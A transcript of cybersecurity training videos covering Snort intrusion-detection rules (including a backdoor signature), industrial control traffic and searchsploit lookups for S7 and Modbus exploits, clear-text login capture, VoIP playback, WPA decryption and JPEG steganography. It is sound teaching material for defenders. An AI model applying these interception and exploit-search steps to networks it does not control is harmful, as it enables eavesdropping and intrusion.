Now this port number is the source port – notice the direction of the arrow here, from source to destination – so this is traffic going from the home network to the external network on any port number. We are generating a msg, so we decide what this says; here it says MALWARE-BACKDOOR, and so on. The whole thing is within double quotation marks, followed by a semicolon.
And then we're checking to make sure that we have an established connection. And then we're taking a look in
the content of the transmission.
[Video description begins] He highlights the following text: flow: to_client, established. [Video description
ends]
Now depending on what kind of traffic you're looking at, such as if it's IPsec encrypted with ESP, your Snort
rules won't be able to see that detailed content.
[Video description begins] He highlights the following text: content:"2|00 00 00 06 00 00 00|Drives|24
00|". [Video description ends]
But this is what's in the payload of the transmission; it could be a text string, but in this case, we've got other values.
[Video description begins] He highlights the following text: classtype:misc-activity.[Video description ends]
And essentially, the next things we're doing are, optionally, setting a classtype, setting the Snort ID, and setting a revision number.
[Video description begins] He highlights the following text: sid:105. [Video description ends]
[Video description begins] He highlights the following text: rev:14. [Video description ends]
So you're going to see a lot of rules in here that you can use if you really want to, but we can also build our
own rules.
[Video description begins] The dlachance@kali: ~ command prompt window opens. The following prompt is
displayed: root@kali:~#. [Video description ends]
So back here in Linux, in addition to using the rules that we can download and keep updating, we can also build our own custom rules, and that really is the power. You can tweak existing rules or create your own to configure exactly how you want intrusion detection to behave in your environment. So I'm going to go ahead and open up /etc/snort/rules using the nano editor, and I'm going to open up a file called local.rules, where I've already added three custom rules. These three custom rules are shown here on separate lines.
[Video description begins] He executes the following command: nano /etc/snort/rules/local.rules. The contents
of the file are displayed in GNU nano 4.8. [Video description ends]
The first rule here is running alert, and I'm interested in basically generating an alert if I see icmp traffic.
[Video description begins] He points to the following text in the local.rules file: alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;). [Video description ends]
So from anywhere, any port, going to the home network – that's the variable in the snort.conf file – and any port on the home network. Then the message I want to generate that will show up is "ICMP test". I can set a sid
number as long as it's over a million, which it is, 1000001. And then I'm setting rev:1; of this rule, and I can
optionally set the classtype, in this case, to icmp-event. So the class type is just a predefined Snort category
type that can help when you have a lot of rules for organizing them, especially in other visualization tools.
Okay, so we are looking for any type of ICMP traffic, from anywhere going to the home network, any host and
any port number. Although if you are pinging, for example, that doesn't really use a port number anyway, just
an ICMP type. The second rule here is using an alert looking at the tcp protocol.
[Video description begins] He points to the following text in the local.rules file: alert tcp any any ->
$HOME_NET 23 (msg:"Telnet connection attempt"; sid:1000002; rev:1;). [Video description ends]
And what we're doing is really looking for anything targeting anything in our $HOME_NET range on port 23. TCP port 23 is used for Telnet, and we want to know if there are any Telnet connection attempts, so the message is "Telnet connection attempt". That's what we've decided we want the message to be, and all we're doing here is giving it the next Snort ID number, 1000002 to be specific, and it's revision one of my custom rule. And notice the syntax here: each of these components is separated with a semicolon. And the entire rule, after you have defined the direction and the source and target, is enclosed within opening and closing parentheses. Finally, the last rule here is TCP based. Really, what's different here is we're looking at content.
[Video description begins] He points to the following text in the local.rules file: alert tcp any any -> any any
(msg:"Failed website login for BadStore"; content:"not found"; sid:1000003; rev:1;). [Video description ends]
Content is in the packet payload. I'm looking for the text "not found".
[Video description begins] He opens a web page called "BadStore.net - Register/Login". It is divided into two
parts. The first part is a navigation pane. The second part is a content pane. A page called "Login to Your
Account or Register for a New Account" is open in the content pane. [Video description ends]
Now on my sample vulnerable website here, BadStore.net, if I attempt to log in or register – let's say I put in an email, [email protected], and some kind of password – I go to attempt to Login.
[Video description begins] A window called “*Wi-Fi” opens. It is divided into four parts. The first part is a
menu bar. The second part is a tool bar. The third part is an address bar. The fourth part is a content pane.
The content pane includes three sections. [Video description ends]
So it didn't work – "UserID and Password not found!" – but let's take a look at our Wireshark packet capture of that transmission.
[Video description begins] He points to the first section. It includes a table with seven columns and several
rows. The column headers are No., Time, Source, Destination, Protocol, Length, and Info. [Video description
ends]
So here on Wireshark, I'm on packet number 1, I'm going to go to Edit, Find Packet, I want to look in the
Packet details for the text not found.
[Video description begins] He clicks a menu option called "Edit" and selects an option called "Find
Packet". [Video description ends]
And here it says, UserID and Password not found and so on.
[Video description begins] He points to the third section in the content pane. [Video description ends]
So basically, when you use content with your Snort rules, you can look at any of this visible content to trigger some kind of action – in this case, an alert. I want to look for "not found"; I could get more detailed, but that should be sufficient for this example.
[Video description begins] He switches to the dlachance@kali: ~ command prompt window. A file called
“/etc/snort/rules/local.rules” is open in GNU nano 4.8. [Video description ends]
Okay, and I want the message to say Failed website login for BadStore, excellent.
[Video description begins] He highlights the following text: Failed website login for BadStore. [Video
description ends]
So I'm going to press Ctrl+X to get out of there. Now, the next thing that we want to do is load up Snort, so we
can see messages on the console.
[Video description begins] The following prompt is displayed: root@kali:~#. [Video description ends]
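Before starting Snort in alert mode, it's worth letting it validate the configuration and rules first; a quick sanity check, assuming the default config path used on this system, would be:

snort -T -c /etc/snort/snort.conf

The -T option runs Snort in self-test mode: it parses snort.conf and every rules file it includes, reports any syntax errors, and then exits without capturing traffic.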
So I'm going to run snort with dash capital A console – the capital A means I want to run Snort in alert mode – and dash lowercase q for quiet mode.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
I don't want to see initialization information. I'm going to specify the config file with -c. So the default is
/etc/snort, and then snort.conf, and finally -i for interface, I want Snort to listen on interface eth0 on this host.
Now what's going to happen is it's going to be in alert mode. And if there are any existing rules that would
generate alerts, we'll see those, but we want to test our three custom rules to see what we get, okay.
[Video description begins] He executes the following command: snort -A console -q -c /etc/snort/snort.conf -i
eth0. [Video description ends]
So this is good, it shouldn't return anything until it starts seeing traffic that it should be reporting on.
[Video description begins] He opens a window called "Command Prompt". The following prompt is displayed:
D:\>. It displays the following command: telnet 192.168.4.52. [Video description ends]
So here in Windows, I'm going to run Telnet against a host. It's trying to connect, but it couldn't open the connection because there isn't a Telnet daemon there.
[Video description begins] The output reads: Connecting To 192.168.4.52...Could not open connection to the
host, on port 23: Connect failed. The prompt does not change. [Video description ends]
Back here in Linux, where Snort's running, notice we've got Telnet connection attempts showing up. We also have some other ones, like Universal Plug and Play, or UPnP, scans; that's from the default rule set – I didn't create a rule for that in our custom Snort file.
[Video description begins] He highlights the following text in the output: SCAN UPnP service attempt. [Video
description ends]
But so far, it's picking up our Telnet connection attempts. Back here in my Windows host, a different host on
the network, I'm just going to go ahead and send a ping to that host.
[Video description begins] He highlights the following text in the output: Telnet connection attempt. [Video
description ends]
Now that host is the one where we're running Snort, but it doesn't have to be, if Snort can see all the traffic. So
we're getting a reply and ping is happening.
[Video description begins] He executes the following command: ping 192.168.4.52. The output displays the
messages of the ping process. The prompt does not change. [Video description ends]
Let's go check out the Snort console.
[Video description begins] He switches to the dlachance@kali: ~ command prompt window. [Video
description ends]
All right, so we can see a lot of ICMP PING alerts. Snort knows the traffic is coming from Windows, and of course we can see the source and destination IP addresses.
[Video description begins] He highlights the following text in the output: ICMP PING Windows. [Video
description ends]
So this is the station I initiated the ping from, and the target happens to be this host running Snort. But remember, you don't have to limit Snort rules to watching only what's happening on the Snort host itself. That would be very limiting and not very flexible.
[Video description begins] He highlights the following text in the output: 192.168.4.24 ->
192.168.4.52. [Video description ends]
Back here in our BadStore.net, let's try to log in with a fake account. Let's call this fake1, and I'll just put in the
password being the same thing.
[Video description begins] He switches to the BadStore.net - Register/Login web page. [Video description
ends]
And it says UserID not found. Then a message appears saying a data breach on a site might have exposed your password.
[Video description begins] A message box called "Change your password" opens. [Video description ends]
That's fine, that's the Chrome web browser telling you that, that's a good thing.
[Video description begins] He clicks a button called "OK" and the message box closes. [Video description
ends]
And back here in Linux with Snort, we've got a lot of activity. But we can see, if we go far up enough, that
we've got some failed login attempts, so failed website login for BadStore.
[Video description begins] He highlights the following text in the output: Failed website login for
BadStore. [Video description ends]
Back here in the /etc/snort/snort.conf file, I've opened up that file with the nano editor, pressed Ctrl+W to search, and looked for the word output. This determines the format of the output files under /var/log/snort.
[Video description begins] He switches to the /etc/snort/rules/local.rules file in the GNU nano 4.8. [Video
description ends]
So we'll start with snort.log, and we can see some details related to that.
[Video description begins] He highlights the following text: output unified2. [Video description ends]
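For reference, the unified2 output directive in snort.conf typically looks something like the line below. The exact filename and options may differ in your configuration, so treat this as a sketch rather than the precise line from this demo.

output unified2: filename snort.log, limit 128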
So that's where you're going to be going to look at some of the output aside from the console.
8. Video: Industrial Control System Network Traffic (it_cscysa20_16_enus_08)
During this video, you will learn how to analyze an ICS traffic capture.
Objectives
[Video description begins] Topic title: Industrial Control System Network Traffic. The presenter is Dan
Lachance. [Video description ends]
One way to analyze network traffic is to capture it using a tool such as Wireshark and then save it as a capture file for future analysis.
[Video description begins] A web site called “wiki.wireshark.org/SampleCaptures” opens. It contains tabs called
“FrontPage”, “RecentChanges”, “FindPage”, “HelpContents”, and “SampleCaptures”. The
SampleCaptures tab is selected. [Video description ends]
And there are plenty of packet capture resources out there on the Internet that you can simply download and open up in tools like Wireshark, whether to learn more about protocols or to learn more about intrusion detection. As an example, here I'm at the wiki.wireshark.org site, where there is an enormous number of packet captures to select from, and we can search the page.
For example, if I look for s7, I see I've got a couple of hits here where we can download some packet captures related to the S7 protocol. As I keep going through, we can see many hits here. S7, of course, is a proprietary protocol for Siemens Programmable Logic Controllers or PLCs. Now, outside of Wireshark, there are also many other valid sources of packet captures that you can download.
[Video description begins] He opens a web site called “netresec.com/?page=PcapFiles”. A page called
"Publicly available PCAP files" is open. [Video description ends]
So packet captures for Cyber Defense Exercises and Malware Traffic and so on.
So this is a very valuable source of information from the learning and testing perspective.
[Video description begins] He switches to Wireshark. He points to the first section. It includes a table with seven columns and several rows. The column headers are No., Time, Source, Destination, Protocol, Length, and Info. [Video description ends]
In this first packet capture, we have the ability to look at a lot of S7 communication. We can see here there are some packets for the S7COMM protocol. We can actually filter on that to remove all of the noise.
[Video description begins] He enters s7comm in the address bar. The corresponding details are displayed in
the first, second, and third sections of the content pane [Video description ends]
And see really just that type of traffic. Now, this is used to talk to PLCs or Programmable Logic Controllers using the S7comm protocol, which is proprietary to Siemens. Now if we take a look at the structure of the packet headers, let's just pick one packet here. We'll notice that we've got our standard Ethernet header, so it's got a source and destination MAC address.
[Video description begins] He expands a section called “Ethernet II” in the second section of the content
pane. [Video description ends]
[Video description begins] He right-clicks the 00:1c:06:27:64:11 text and selects an option called "Copy". He
further selects an option called "Value". [Video description ends]
And I can look it up in another tool to see which manufacturer it belongs to; the first three octets of the MAC address, the OUI, identify the vendor. Now, here we can see it's listed clearly, but we can also use online lookup tools to figure this out.
[Video description begins] He opens a web site called “macvendors.com”. [Video description ends]
So on this sample site macvendors.com, I've entered in the MAC address and it tells me that it's a Siemens
Numerical Control Ltd. type of device.
[Video description begins] He pastes the value: 00:1c:06:27:64:11 in a text box called "Enter a MAC
Address". [Video description ends]
So we can figure that out quite easily when we're looking at packet captures, if it's not otherwise shown
already.
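As an alternative to an online lookup, the same check can often be done offline. This is only a sketch, assuming Nmap is installed and its bundled OUI list sits at its usual path; it searches for the vendor prefix 00:1c:06 seen in this capture.

grep -i '^001C06' /usr/share/nmap/nmap-mac-prefixes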
So back here in the packet capture, we can then see that the next header is going to be IPv4. And indeed we
have an Internet protocol or IPv4 header with the standard type of information.
[Video description begins] He expands a section called “Internet Protocol Version 4” in the second section of
the content pane. [Video description ends]
So we can see the Time to Live or TTL value, the next protocol header, which is going to be TCP, a checksum, and the source and destination IP addresses. So all of the stuff that we would normally expect in an IP network. Then of course we've got the OSI Layer 4 Transmission Control Protocol or TCP header.
[Video description begins] He expands a section called “Transmission Control Protocol” in the second
section of the content pane. [Video description ends]
We can see the source and destination ports. Now notice the source port here is 102. Port 102 is usually used to talk to specific types of PLCs, in this case, Siemens-style PLC devices. Now, as you might imagine, port 102 is normally blocked on most routers; in other words, it's not allowed through. So the traffic is usually kept within a specific local area network designated for PLCs. And we can see by looking at the network addresses that the source and destination are on the same subnet, although it's hard to say for certain without seeing the subnet mask.
[Video description begins] He points to the first section in the content pane. [Video description ends]
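If you prefer the command line, the same kind of filtering can be done with tshark, Wireshark's terminal counterpart. This is just a sketch, and the capture file name below is a hypothetical placeholder rather than the file used in this demo.

tshark -r s7-sample.pcap -Y 's7comm && tcp.port == 102'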
So as we dig down through the headers, we're now in the S7 Communication header, we can start to see some
more details about what is being done.
[Video description begins] He points to a section called "S7 Communication" in the second section in the
content pane. [Video description ends]
[Video description begins] He opens the dlachance@kali: ~ command window. The following prompt is
displayed: root@kali :/#. [Video description ends]
Now here in Kali Linux, if I were to use the searchsploit command, and let's say I just searched for s7.
[Video description begins] He executes the following command: searchsploit s7. The output displays various
references for s7. The prompt does not change. [Video description ends]
Immediately I see a lot of references for exploits such as the CPU START/STOP Module. Of course, in order for this to work, the attacker would have to gain access to the network where the PLCs reside. Now, often those types of networks can be very sensitive, and so they might be air gapped. But there have been known cases where someone was tricked into downloading a file, putting it onto a USB thumb drive, and then walking into a facility and plugging that thumb drive into a computer on the air-gapped network; then there could be a problem. We can do the same type of thing with the Modbus protocol, a standard protocol often used with Schneider Electric devices on industrial control system or ICS networks. So let's say we were to searchsploit modbus.
[Video description begins] He executes the following command: searchsploit modbus. The output displays various references for modbus. The prompt does not change. [Video description ends]
Well, we now see numerous exploits related to that as well, built into a free, standard, publicly available tool in the form of Kali Linux. So it's important, then, to understand how devices communicate on an industrial control network and to set a baseline so that you can determine what is abnormal.
[Video description begins] Topic title: HTTP Authentication Traffic. The presenter is Dan Lachance. [Video
description ends]
If a malicious user can get connected to a network, then they have the potential of inserting themselves between two communicating devices, a man-in-the-middle attack, perhaps through ARP cache poisoning, so that they can see all network transmissions. And if some of those network transmissions aren't encrypted, the attacker will see everything.
[Video description begins] A web page called “BeEF Authentication” opens. [Video description ends]
So in this example, I'm going to a sample web application under my control, where I can see in the address bar
there's a message that says it's Not secure.
[Video description begins] He clicks a link in address bar called "Not secure" and a message box called
“Your connection to this site is not secure” opens. [Video description ends]
So this means that I'm connected over HTTP and not HTTPS. And it says, don't enter any sensitive
information like passwords or credit cards, because it could be stolen by attackers, which is correct.
[Video description begins] He closes the message box. He opens a window called
"http_clear_authn_traffic_packet45.pcapng". It is divided into four parts. The first part is a menu bar. The
second part is a tool bar. The third part is an address bar. The fourth part is a content pane. The content pane
includes three sections. [Video description ends]
So I'm going to enter a Username and a Password and log in to the simple web application, all the while capturing traffic in Wireshark in the background. Here in Wireshark, I can see a lot of transmissions were captured. So the first thing I really want to do is apply a filter here so we're only looking at what's relevant; let's weed out the noise. The web application I'm interested in is at 192.168.4.24, so I'm going to filter using ip.addr == that address. Two equal signs is the equality syntax here in Wireshark, and I'll press Enter. So now I've filtered the traffic.
[Video description begins] He enters ip.addr==192.168.4.24 in the address bar. The corresponding details
are displayed in the first, second, and third sections of the content pane. [Video description ends]
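To narrow this down even further, you could also filter on the login request itself. This is a sketch, assuming the credentials were submitted with an HTTP POST; the same display filter works in Wireshark's filter bar or with tshark on the command line, as shown here against this demo's capture file.

tshark -r http_clear_authn_traffic_packet45.pcapng -Y 'ip.addr == 192.168.4.24 && http.request.method == "POST"'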
Now I could go through and take a look at the traffic, and for example, see some HTTP traffic. And I could
perhaps go to Analyze, Follow, TCP Stream.
[Video description begins] He points to the first section in the content pane. [Video description ends]
[Video description begins] He selects a menu called "Analyze" and selects a menu option called "Follow". He
further selects an option called "TCP Stream" from the flyout. The corresponding dialog box opens. [Video
description ends]
I see a BEEFSESSION cookie, which implies that authentication has already occurred. So I don't really see a username or password at this point; I'm probably too far down in the packet stream. That's okay. Let's go back to our original filter and start at the very top of this filtered list of traffic. I'll select the first packet. Once again, I'll go to Analyze, Follow, TCP Stream. This time, we have what we were looking for.
[Video description begins] The corresponding dialog box opens. [Video description ends]
The username is beef, and the password is beef. This is what was sent in clear text over the network when logging into that web app. And so instead of having to look through every individual packet that was captured, you can select a packet, follow its stream, and have Wireshark put it all together so it's more readable, as was done here. So the lesson is simple: encrypt everything, whether it's data at rest or network transmissions. Really, there's no reason in this day and age to have a web application that requires authentication where that web app is not configured to use HTTPS. It needs to be using TLS.
In this video, find out how to play back a captured VoIP call.
Objectives
[Video description begins] Topic title: VoIP Traffic Analysis. The presenter is Dan Lachance. [Video
description ends]
Voice over IP or VoIP, V-O-I-P, is widely used around the globe and has been for years, both at a personal level and within the enterprise, such as with VoIP phones. What this really means is we're using a standard TCP/IP network to transmit packets that contain voice information. Now, what's important is that performance be good enough that we can transmit the packets quickly and put them back together, so the person on the other end can make sense of what's being said and not too much has been lost in the way of packets during the transmission. That's where the Session Initiation Protocol or SIP comes in, which is used to set up, maintain, and then tear down sessions that involve things like Voice over IP.
[Video description begins] He opens a window called "sip-rtp-g726.pcap". It is divided into four parts. The
first part is a menu bar. The second part is a tool bar. The third part is an address bar. The fourth part is a
content pane. The content pane includes three sections. [Video description ends]
So here in Wireshark, I've got a packet capture where we can see there is a lot of SIP and RTP traffic. RTP is
also involved in transmitting, in this context, audio over an IP network.
[Video description begins] He points to the first section which includes a table with multiple rows and seven
columns in the content pane. He points to the table. [Video description ends]
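If you wanted to narrow a busy capture down to just this call traffic, a display filter for the two protocols would do it. As a sketch, using tshark against the capture file shown in this demo:

tshark -r sip-rtp-g726.pcap -Y 'sip || rtp'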
Well, the thing about this is that because it's often very time sensitive, you'll find that many VoIP calls over the network are not encrypted. They can be encrypted, and of course, we can control network path routing and have isolated networks for VoIP devices to further protect them. But if someone happens to capture unencrypted VoIP traffic, then they could actually reassemble the stream and play back the audio, as an example. In this sample packet capture, I'm going to select the first packet in the list; it's a SIP packet. And here in Wireshark, I'm simply going to go to Telephony, then go all the way down and choose SIP Flows.
[Video description begins] He selects a menu called "Telephony" and selects a menu option called "SIP
Flows". The corresponding dialog box opens. It includes a table with several rows and columns. He points to
the table. [Video description ends]
Here, we can see there were some communication sessions between hosts on the network, and we can see, of course, the Initial Speaker, so the IP address. We can also see the SIP address of the recipient, and so on. So I'm going to go ahead and select one of these and click the Play Streams button. And sure enough, we can see it's put together a waveform.
[Video description begins] He selects the last row. A window called “Wireshark • RTP Player” opens. [Video
description ends]
And if I click the play button, I'll actually be able to listen back to what that part of the conversation was.
[Video description begins] He clicks a button called "Close" and the window closes. [Video description ends]
So it's always crucial to make sure that if we're going to deploy something like VoIP devices, Voice over IP phones, on a network, we have strict network access control policies in place to limit access to that network.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
And you might even consider, in some cases, encrypting the traffic if it doesn't negatively affect the quality of calls.
[Video description begins] Topic title: Online Network Traffic Analysis. The presenter is Dan
Lachance. [Video description ends]
An important skill for cybersecurity analysts is not only the ability to properly capture network traffic, but also to analyze it, looking for suspicious activity or indicators of compromise. What's equally important is knowing about tools that can do that analysis for us, including online tools.
[Video description begins] A web site called “packettotal.com” opens. [Video description ends]
One of many examples is packettotal.com, whose website we're looking at here. I can either drag packet capture files here or click to upload, so I'm going to go ahead and click to upload a simple packet capture.
[Video description begins] A message box called "Begin PCAP Analysis" opens. [Video description ends]
Now, it's not very big, about half a megabyte in size. So I'm going to go ahead and click on I'm not a robot, and I'll click Analyze. The size of the packet capture will determine how long this takes. It'll then redirect me and give me an immediate response about what I should be concerned about. Now, these links across the top will vary depending on the nature of the content of the packet capture file, so depending on the nature of the traffic.
[Video description begins] A new page is displayed. It contains tabs called "Malicious Activity",
"Connections", "HTTP", "Transferred Files", and "Similar Packet Captures". The Malicious Activity tab is
selected. It includes a table with ten columns and two rows. The column headers include Timestamp, Alert
Description, Alert Signature, Severity, Sender IP, Sender Port, and Target IP. [Video description ends]
But immediately, we have a concern. It says Malicious Activity, A Network Trojan was detected. And we can even see the Alert Signatures, so something about Evil Redirector Leading to EK. Often a Network Trojan is simply used to disguise something malicious as benign or innocent, tricking someone into clicking on something that might unleash ransomware or some other kind of malware that would reach out to the Internet from the infected station to a command and control server, which could be this Target IP. Let's just search up this Target IP in our favorite web browser search engine and see what we get. Well, it doesn't take long to get a result when I search for that.
[Video description begins] He opens the Google search and enters 83.217.27.178 in a search box. [Video
description ends]
And if I click on one of the links, it looks like most users of this particular service have voted this as a
malicious site.
[Video description begins] He clicks a link called "IP > 83.217.27.178 | Threatcrowd.org Open Source
Threat". A new web site opens. [Video description ends]
There are links down below for reports. And then there are different domain names, at different points in time, that have been associated with this. Well, that's interesting. Why are so many different, hard-to-read, unintelligible domain names associated with this? That could be suspicious. The next thing I'll do is go down to another one, the Neutrino Exploit Kit.
[Video description begins] He goes back to the Google search. He clicks a link called "Neutrino Exploit Kit
via pseudoDarkleech HOPTO.ORG gate". A new web site opens. [Video description ends]
It looks like somebody else has run into the same issue. So we're seeing references to the Neutrino Exploit Kit, which is often simply abbreviated as EK; you'll see that a lot in this type of documentation. So we have some examples here of somebody else having captured the traffic and isolated it, and it looks like there's some kind of infected WordPress component on a site that is downloading the payload for the malware. And we can even take it a step further by looking to see if there are any known Common Vulnerabilities and Exposures listings or CVEs related to Neutrino. So I've gone to the cve.mitre.org site, I'm going to click Search CVE List, and I'm going to search up neutrino. And immediately, we can see we have all kinds of search results. So this is definitely a known issue.
[Video description begins] He opens the packettotal.com web site. [Video description ends]
So back here where we uploaded our packet capture, that probably resulted in a quicker analysis and
identification of a threat than we could have done manually by simply scouring through the packet capture.
In this video, find out how to enter a WPA password in Wireshark to decrypt wireless traffic.
Objectives
enter a WPA password in Wireshark to decrypt wireless traffic
[Video description begins] Topic title: IEEE 802.11 WPA Traffic. The presenter is Dan Lachance. [Video
description ends]
We know that one of the simplest things you can do to protect a Wi-Fi network is to enable encryption. Now, we want to stay away from known vulnerable encryption schemes for wireless networks like WEP, W-E-P, and instead opt for WPA2 or WPA3. But if you capture network traffic from a Wi-Fi network that is encrypted, when you look at the packet capture on its own afterwards, you're not really going to see very much unless you enter the decryption key, which would then reveal all of the packet headers and details.
[Video description begins] He opens a window called "Wi-Fi_wpa-PW_Induction.pcap". It is divided into four
parts. The first part is a menu bar. The second part is a tool bar. The third part is an address bar. The fourth
part is a content pane. The content pane includes three sections. [Video description ends]
For example, here in Wireshark I've got a packet capture, a Wi-Fi packet capture we can see the Protocol is
802.11, that's the Wi-Fi standard.
[Video description begins] He points to the first section which includes the table with several columns and
rows in the content pane. He points to the table [Video description ends]
Now as we go down through these packets and just randomly take a peek at them, we can see that in the
headers, well, I have a Radiotap Header, an 802.11 radio information header.
[Video description begins] In the second section of the content pane, he expands a section called "Radiotap Header v0". [Video description ends]
[Video description begins] He expands a section called "802.11 radio information". [Video description ends]
Then I've got an IEEE 802.11 Acknowledgment, but where's everything I'm used to seeing, where are the other
headers?
[Video description begins] He expands a section called "IEEE 802.11 Acknowledgement" in the second
section of the content pane. [Video description ends]
How do I know if this is an HTTP packet, or whether it's an ARP transmission or a ping packet using ICMP? There's no way to know while it's encrypted. And that's why in Wireshark we have the ability to enter the decryption passphrase. Now, we can do that if we know it, and I do know it. So I'm going to go to the Edit menu, and I'm going to go down into Preferences here in Wireshark.
[Video description begins] A dialog box called "Wireshark • Preferences" opens. [Video description ends]
I'm going to expand Protocols, and we're looking for IEEE 802.11.
[Video description begins] A dialog box called "WEP and WPA Decryption Keys" opens. [Video description
ends]
So we're going to go all the way down to the entries starting with I, and there it is, IEEE 802.11. Now I'm going to click the Edit button for decryption keys, and I'm going to add a new entry here; we're not using WEP or anything like that.
[Video description begins] He clicks a button called "+". A new entry gets added. [Video description ends]
[Video description begins] He clicks a drop-down list box called "Key type" and a drop-down list appears. He
selects an option called "wpa-pwd" from the drop-down list. [Video description ends]
And the password here for this sample packet capture is Induction.
[Video description begins] He enters Induction under a column header called "Key". [Video description ends]
[Video description begins] He clicks a button called "OK" and the WEP and WPA Decryption Keys dialog box
closes. [Video description ends]
Now, if we start looking through these packets, let's pick on one just for fun here; how about we go way, way down.
[Video description begins] He clicks a button called "OK" and the "Wireshark • Preferences dialog box
closes. [Video description ends]
[Video description begins] He points to the first section in the content pane. [Video description ends]
Here we can see that if we start to break down the packet headers, we can see some detail. Logical-Link
Control, Internet Protocol, finally an IP header, User Datagram Protocol, UDP header with port information.
[Video description begins] He points to the second section in the content pane. [Video description ends]
And we can see the details, in this case, a Multicast Domain Name System. We can see more beyond just the
IEEE 802.11 headers. And that's only because we've entered the decryption passphrase, in this case for WPA.
Now that's packet 581, let's just double check here. Let's go back into Edit, Preferences and let's turn off
decryption to see how packet 581 looks after the fact.
[Video description begins] The "Wireshark • Preferences dialog box opens. [Video description ends]
Let's make sure we jump into the Is, IEEE 802.11. I'm going to remove the check-mark for enable decryption
and click OK. And packet 581, again, we can't really make much sense of it.
[Video description begins] The "Wireshark • Preferences dialog box closes. [Video description ends]
We've lost all of the headers because we don't have a way to decrypt what's actually in that transmission.
[Video description begins] He points to the second section in the content pane. [Video description ends]
So this is going to be important if you are capturing and analyzing traffic on a multitude of wireless networks
that are using, for example, WPA passwords.
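The same decryption can also be applied from the command line. This is only a sketch, assuming a recent tshark build that accepts the wlan.enable_decryption preference and the 80211_keys table override, using the capture file and passphrase from this demo.

tshark -r Wi-Fi_wpa-PW_Induction.pcap -o wlan.enable_decryption:TRUE -o 'uat:80211_keys:"wpa-pwd","Induction"'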
Find out how to use hashing to detect file changes made through steganography.
Objectives
[Video description begins] Topic title: Steganography and Hashing. The presenter is Dan Lachance. [Video
description ends]
[Video description begins] A command window called “Administrator: Windows PowerShell” opens. The
following prompt is displayed: PS D:\Steg>. [Video description ends]
Now, in our context, we're going to do an example of hiding a message within a JPEG image. This is one way to covertly transmit what looks like a benign message, perhaps a simple picture, to someone over the Internet, when in fact there's an embedded message in the picture. So here on drive D on my machine, in the Steg folder, if I do a dir, I've got two files.
[Video description begins] He executes the following command: dir. The output displays list of files in the
directory. The prompt does not change. [Video description ends]
One of which is a jpg, dogs.jpg. Let's just open that up and see what it looks like.
[Video description begins] He opens the File Explorer window. [Video description ends]
So here in the GUI, there's dogs.jpg on drive D under Steg. And if we just double-click to open it up, we can see indeed it is a picture of two dogs, so it looks pretty innocent, and it's fun. However, we're going to use a tool, and there are plenty of tools out there that will do this, a Jpeg_FileHider type of tool, where we can embed a file within the jpg. Let's go ahead and create one. I'm going to right-click here, choose New, and create a new text file. This is going to be Secret.txt, and within it I'm going to type This is a secret.
[Video description begins] He opens a file called "Secret.txt". [Video description ends]
All right, let's close and Save that and let's get this done.
[Video description begins] He double-clicks a file called “Jpeg_FileHider.exe”. A message box called
“Welcome to JPHS for Windows” opens. [Video description ends]
So I'm going to open my Jpeg_FileHider tool, my steganography tool, accept the terms of usage, and I'm going
to open up this jpeg file.
[Video description begins] He clicks a button called “Yes, I accept these terms”. A window called “JPHS for
Windows – Freeware version BETA test rev 0.5” opens. [Video description ends]
So we can now see the dogs.jpg file has been selected here. Then I'm going to click the Hide button up at the
top or the Hide menu, and I'm going to enter and confirm a pass phrase, after which I will click OK.
[Video description begins] A dialog box called "Enter the pass phrase and confirmation" opens. [Video
description ends]
Then I'm going to embed my Secret.txt, so select the file you want to hide.
[Video description begins] A dialog box called "Select the file you want to hide" opens. [Video description
ends]
So select that and click Open. We can see the Hidden file here.
[Video description begins] The Select the File you want to hide dialog box closes. The JPHS for Windows –
Freeware version BETA test rev 0.5 window is displayed. [Video description ends]
So at this point, I'm just going to click Save jpeg. Now, we could also save it as something else; maybe we will here, we'll save it as dogs2.jpg. Once that's been done, we can see dogs2.jpg is the resultant file, and there it is in the background. So let's just minimize this for a minute and open up dogs2.jpg. Okay, let's go back and look at the other dog file, because it looks pretty much the same, at least visually. Well, that's the whole point. With steganography, we're hiding something, our secret message, within something that looks innocent. So how do you detect this? One way is using file hashing, given that you had the opportunity to get the original file hash. Let's go to PowerShell and test this out.
[Video description begins] He opens the Administrator: Windows PowerShell window. The following prompt
is displayed: PS D:\Steg>. [Video description ends]
Now here in PowerShell, let's clear the screen and type dir, we now have dogs.jpg and dogs2.jpg.
[Video description begins] He executes the following command: cls. The screen gets cleared and the prompt
does not change. He executes the following commands: dir. The output displays list of files in the directory.
The prompt does not change. [Video description ends]
[Video description begins] He executes the following commands: get-filehash dogs.jpg and get-filehash dogs2.jpg. The output of each command displays details in a table with three columns and one row. The column headers are Algorithm, Hash, and Path. The prompt does not change. [Video description ends]
The hashes are not the same. What does that tell us? It means that since the original file existed, something in it has been modified, even though it might look exactly the same; this is not the same hash value.
[Video description begins] He highlights the Hash values in the output of commands: get-filehash dogs.jpg
and get-filehash dogs2.jpg. [Video description ends]
So this is one way to detect that a change has occurred when it otherwise might be very difficult to determine that it has happened. But again, you have to have access to the original file hash in order to make this determination.
[Video description begins] He switches to the File Explorer window. [Video description ends]
Now to complete this example, let's open up our Jpeg_FileHider tool again, and we're going to open up the
dogs2.jpg.
[Video description begins] The Welcome to JPHS for Windows message box opens. [Video description ends]
Okay, so dogs2 specified, now I'm going to click Seek, and it wants the pass phrase.
[Video description begins] The JPHS for Windows – Freeware version BETA test rev 0.5 window
opens. [Video description ends]
So both parties would have to have knowledge of this pass phrase for this to work.
[Video description begins] The Enter the pass phrase and confirmation dialog box opens. [Video description
ends]
And as soon as I enter the correct pass phrase it says Save the hidden file as, well, this is interesting.
[Video description begins] A dialog box called "Save the hidden file as" opens. [Video description ends]
Let's call it Secret2, just so we can have another file here and keep things straight. And I'll close out here and
I'll open Secret2 and there's the contents of it.
[Video description begins] He clicks a button called “Save” and the Save the hidden file as dialog box closes.
A file called "Secret2.txt" opens. [Video description ends]
So this is one way that steganography can be implemented to hide messages in otherwise normal looking files.
monitor, block, and configure notifications for devices on a Wi-Fi network using the eero app
[Video description begins] Topic title: Wi-Fi Connected Devices. The presenter is Dan Lachance. [Video
description ends]
Knowing what's on your network goes a long way in helping you secure assets on that network.
[Video description begins] Various apps are displayed on the Android phone. [Video description ends]
In this example, I'm on my Android phone where I've got the eero app installed, E-E-R-O. eero makes wireless
access points and extenders that you can place throughout a facility. So I'm going to go ahead and click on that
to get some stats about my network.
